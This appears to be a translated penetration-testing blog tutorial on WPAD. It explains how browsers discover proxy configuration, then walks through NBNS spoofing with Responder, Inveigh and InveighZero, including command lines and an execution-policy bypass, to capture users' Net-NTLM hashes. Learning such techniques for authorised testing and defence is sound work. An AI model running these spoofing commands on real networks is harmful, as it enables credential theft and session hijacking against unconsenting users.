Introduction to WPAD
The full name of WPAD is Web Proxy Autodiscovery Protocol. It allows the browser to automatically discover the proxy server, locate the proxy configuration file, download, compile and run it, and finally automatically use the proxy to access the network.
WPAD principle
When users access a web page, they will first query the location of the PAC file. The specific method is as follows:
-
DHCP server: The web browser sends a DHCP INFORM to the DHCP server to query the PAC file location, and the DHCP server returns a DHCP ACK packet containing the PAC file location.
-
DNS query method: The web browser initiates a WPAD+X query to the DNS server. The DNS server returns the IP address of the WPAD host. The web browser downloads wpad.dat through port 80 of the IP.
-
NBNS query method
Supplementary note:
1. Windows 2K, XP, and 2K3 only support DNS and NetBIOS
2. Windows Vista and later (including 2K8, Win7, Win8.x, Win 10) support DNS, NBNS, and LLMNR
3. If neither the DHCP nor the DNS server responds, and the current cache does not have the requested host name, and the current system supports LLMNR (Link-Local Multicast Name Resolution), a broadcast LLMNR query will be initiated first. If there is no response, a broadcast NBNS query will be initiated. , if a host responds to the PAC file location, the web browser downloads wpad.dat through port 80 of the IP
WPAD vulnerability
According to the principle of WPAD, if the attacked user forges an NBNS response when initiating an NBNS query, it can be controlled to access the Internet through the forged proxy server to achieve the purpose of session hijacking.
WPAD Spoof
Responder
The Responder tool is used below to conduct NBNS spoofing attacks:
Step 1: Run Responder with the following parameters to implement WPAD spoofing
./Responder.py -I eth0 -w -F
Step 2: After the victim opens the browser and accesses (in the case of clearing the session), authentication will be forced once
Step 3: Successfully capture the user’s Net-NTLM Hash
Inveigh implementation
Inveigh download address: https://github.com/Kevin-Robertson/Inveigh
Step 1: Use administrator rights to open the powershell of the attacking machine and enter the following commands in sequence
. .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y
#PS:如果有执行策略限制再加一条Set-ExecutionPolicy Bypass -Scope Process
Step 2: When the user opens the browser, a WPAD identity authentication will be automatically performed (if the user has cleared the session before), and normal access cannot be done without verification.
Step 3: Successfully capture the user Net-NTLM Hash value
InveighZero
Project address: https://github.com/Kevin-Robertson/InveighZero
Step 1: Open the cmd of the attacking machine with administrator rights and execute the following command
Inveigh.exe
Step 2: Perform identity authentication later
Step 3: Successfully capture the user’s Net-NTLM Hash
reference link
https://max.book118.com/html/2017/1101/138462395.shtm
Extension at the end of the article
Intranet penetration tools are continuously updated, and we will also demonstrate and share the use of some tools in combination with the environment when we have the opportunity:
https://github.com/Al1ex/Pentest-tools
The rest of the man-in-the-middle attack techniques will be added later~
Preview for the next issue: Detailed explanation of AD CS Realy (it’s a belated article, I didn’t have time to post it before, so I’ll add it later)~